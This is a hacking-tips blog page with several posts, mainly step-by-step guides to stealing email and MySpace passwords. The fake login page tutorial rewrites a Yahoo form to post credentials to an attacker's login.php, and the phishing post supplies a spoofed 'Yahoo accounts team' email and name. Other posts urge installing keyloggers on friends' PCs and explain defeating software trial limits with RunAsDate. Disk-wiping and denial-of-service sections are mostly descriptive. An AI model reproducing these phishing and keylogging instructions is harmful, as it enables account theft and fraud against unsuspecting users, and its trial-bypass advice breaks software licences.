This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Hacking a MySpace Account


MySpace is one of the most widely used Social Networking website by many teenagers and adults across the globe.If you’re curious about hacking a MySpace Account or preventing your MySpace account from being hacked, then this post is for you.


Here are some of the ways of hacking a MySpace account.


Phishing


Phishing is the most commonly used method to hack MySpace or any other email accounts.The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages.These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc.But once the user attempts to login through these pages, his/her login details are stolen away.


Phishing is proved to be the most effective way of hacking passwords and also has high success rate.The reason for this is quite simple.The users are not aware of the phishing attack.Also the users are fooled, since the fake login pages imitate the appearance of the original pages.So, you may use the phishing technique to hack your friend’s MySpace account (just for fun).


A detailed tutorial on phishing is discussed in the following two posts.


Hack Yahoo, Gmail or any other Password.
How to Create a Fake Login Page?

Spywares


The term spyware suggests software that secretly monitors the user’s behavior. Spyware programs can collect various types of personal information, such as Internet surfing habits, sites that have been visited, passwords and other sensitive information.


Keyloggers are the most widely used program, which are nothing but spywares.If you want to hack your friend’s Myspace password, then all you have to do is just install a keylogger on your friend’s PC.Hacking a MySpace account using a keylogger is very easy, but also has some limitations.


For more information on keyloggers and their usage, refer the following post


Hacking an Email Account


Hacking Services


In most cases, hacking services are scams. Always ask for proof first before paying anything.I have tried many such hacking services(just to test them), but none of them have responded back.So personally I do not trust such services.


Please pass your comments and opinions….

How to Completely Erase a Hard Disk Drive

A new year has begun and perhaps you have decided to perform a system upgrade or get rid of your old computer system and purchase a new one.But before you sell or donate your old computer, it is very much necessary to completely erase your Hard Disk Drive.Yes, every one of us are aware of this fact and so, we delete the contents of the hard disk either by using the DELETE key on our keyboard or by Formatting the hard disk.


Deleting and Formatting - Just Not Secure Enough


But the fact is, the data will still be on the hard disk even after deleting it or formatting the hard disk. Using the delete key on your keyboard will only remove the shortcuts to the files making them invisible to users. Deleted files still reside on the hard drive and a quick Google search will show many options for system recovery software will allow anyone to reinstate that data.


Formatting the hard drive is a bit more secure way to erase the hard disk. Formatting a disk will not erase the data on the disk, only the address tables. It makes it much more difficult to recover the files. However a computer specialist would be able to recover most or all the data that was on the disk before the reformat. For those who accidentally reformat a hard disk, being able to recover most or all the data that was on the disk is a good thing. However, if you’re preparing a system for retirement to charity or any other organization, this obviously makes you more vulnerable to data theft.


Erasing the Hard Disk through DISK WIPING


So it is necessary for us to use a 100% secure way to erase the hard disk.The secure way of erasing the hard disk is called Disk Wiping.Disk wiping is a secure method of ensuring that data, including company and individually licensed software on your computer and storage devices is irrecoverably deleted before recycling or donating the equipment. Because previously stored data can be brought back with the right software and applications, the disk wiping process will actually overwrite your entire hard drive with data, several times. Once you format you’ll find it all but impossible to retrieve the data which was on the drive before the overwrite. The more times the disk is overwritten and formatted the more secure the disk wipe is.


There are a variety of disk wiping products available that you can purchase, or freely downloaded online to perform more secure disk wipes.One of my favorite disk wiping software is


WipeDrive/ WipeDrive Professional


You have to use this tool by burning the iso image file onto a CD or by using a floppy disk.After burning this tool you have to boot your PC and follow the screen instructions to completely erase the hard disk.

Hack Software and Run the Trial Program Forever

In this post I’ll show you how to hack a Software and run the trial program forever.Most of us are familiar with many softwares that run only for a specified period of time in the trial mode.Once the trial period is expired these softwares stop functioning and demand for a purchase.But there is a way to run the softwares and make them function beyond the trial period.Isn’t this interesting?


Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares.I’ll try to explain this in brief.


When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc.After installation every time you run the software, it compares the current system date and time with the installed date and time.So, with this it can make out whether the trial period is expired or not.


So with this being the case, just manually changing the system date to an earlier date will not solve the problem.For this purpose there is a small Tool known as RunAsDate.


RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.


RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.It works with Windows 2000, XP, 2003 and Vista.


NOTE: FOLLOW THESE TIPS CAREFULLY


You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.


1. Note down the date and time, when you install the software for the first time.


2. Once the trial period expires, you must always run the software using RunAsDate.


3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.


4. It is better and safe to inject the date of the last day in the trial period.


For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate.


I hope this helps! Please express your experience and opinions through comments.

Get a Call from your own Cell Phone number

Here is a trick to get a call to your cell phone from your own number.Do you think I am crazy? No, I am not…….


Just try the following steps and you’ll get a call to your cell phone from your own number.


 


1. Just give a missed call to this number.You’ll not be charged!


+41445804650


2. Wait for a few seconds and you’ll get a call to your cell phone from your own number


3. Receive the call.You’ll hear a lady voice asking for a PIN number.Just enter some rubbish number.


4. She say’s- Your PIN cannot be processed and the call disconnects..


ANOTHER TRICK


Instead of giving a missed call, just continue calling.The call will not be received and will get disconnected just after a while.But now do you know what happen’s?


You will get a call from the number


+501


Reason behind this trick


God Knows!!


Just try and pass your comments. Tell me whether the second trick worked or not!!

How to Create a Fake Login Page?


In this post I’ll show you how to create a Fake Login Page in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.


Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.


 


Here is a step-by-step procedure to create a fake login page.


1. Go to the Yahoo login page by typing the following URL.


mail.yahoo.com


 2. Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)


3. Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .


4. Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files.You may also rename the .HTML file to yahoo.HTML


5. Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.


For example you may find something like this in the opened HTML file


src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif

Rename the above link into

 

src=”files/ma_mail_1.gif

Repeat the same procedure for every file contained in the Folder.

 

6. Now search for the following term

 

action=

 

you will see something like this

 

action=https://login.yahoo.com/config/login?


Edit this to

 

action=http://yoursite.com/login.php


Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

yoursite.com/


7. Now you have to upload your yahoo.HTML, files folder and login.php to

 


NOTE: Make sure that your host supports PHP


8. Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)


9. Once you do this distribute the Gmail.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file in your site.Download .TXT file to see the password inside


The details of hacking an email, using a Fake login page is discussed in detail in my new post  Hack Yahoo, Gmail or any other Password

Hack Yahoo, Gmail or any Email Password


Today I will show you how to Hack Yahoo, Gmail or any other email Password.I have already shown some of the easiest ways to Hack Yahoo in my previous post Hacking an email account.So, you may wonder what’s special about this post.Here in this post I will show all of you the real way to Hack Yahoo and other passwords.This method to hack passwords is same as the one used by many professional hackers.


NOTE:THIS TUTORIAL IS MEANT FOR EDUCATIONAL PURPOSE ONLY.I AM NOT RESPONSIBLE FOR ANY KIND OF MISUSE. 

 


STEPS TO BE CARRIED OUT BEFORE YOU HACK YAHOO 


Let’s see how to hack Yahoo in particular.Before we hack the password, we have to understand how to exploit the major vulnerabilities in Yahoo.During the sign up process, it allows your First name or the Last name to contain the Word Yahoo .Is this not a major flaw? Yes, because you can choose the first name as Yahoo Account and last name as Update.So, when you send an email from this Yahoo account, it appears to have come from


Yahoo Account Update (Yahoo Accounts Team)


So, this helps us to make the victims believe that this is an email from Yahoo Accounts Team.


So What’s Next?


CREATING A NEW ACCOUNT


Before you hack Yahoo, you need to create a new account as given below


1. Choose the first name as YAHOO ACCOUNT and last name as UPDATE.


2. Select an email ID something like this


update_account@yahoo.com


update08_account@yahoo.com


accountupdate09@yahoo.com  etc.


I think you got the idea.


3. Always select @yahoo.com not yahoo.co.uk or yahoo.co.in.


Now you are all set to hack the password.


USING A FAKE LOGIN PAGE TO HACK YAHOO


We have to hack yahoo using a fake login page.Hacking Yahoo using a Fake login page has more success rate than any other method.In fact, this is the real procedure adopted by many hackers to hack an email password.


The step-by-step procedure to create a fake login page is explained in my post How to create a fake login page


After you have setup your new Yahoo account and the fake login page, it’s just  a cakewalk to hack the password.All you have to do is just send an email from your fake Yahoo account to the victim’s ID saying that


————————————————————————————


Dear <Victim Name> or Yahoo subscriber,


It is highly recommended that you update your account immediately as per the new policy adopted by Yahoo.Blah blah…


Click Here to update your account.


Thanks,


The Yahoo accounts team


————————————————————————————


Remember to link your Fake login page to the text Click Here.Once the victim enters the password in the fake login page, you have successfully hacked the Yahoo password.The above procedure can also be used to hack Gmail and other email passwords.


You can see the DEMO of fake login page that I have created HERE.


Please pass your comments and opinions.

Denial Of Service Attack


Its Real,On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.


What is a Denial Of Service Attack?

 




  • A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.

  • If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack.


Types of denial of service attacks


There are several general categories of DoS attacks.Popularly, the attacks are divided into three classes:



  • bandwidth attacks,

  • protocol attacks, and

  • logic attacks



What is Distributed Denial of Service Attack?



  • An attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time.

  • This makes it difficult to detect because attacks originate from several IP addresses.

  • If a single IP address is attacking a company, it can block that address at its firewall. If it is 30000 this is extremely difficult.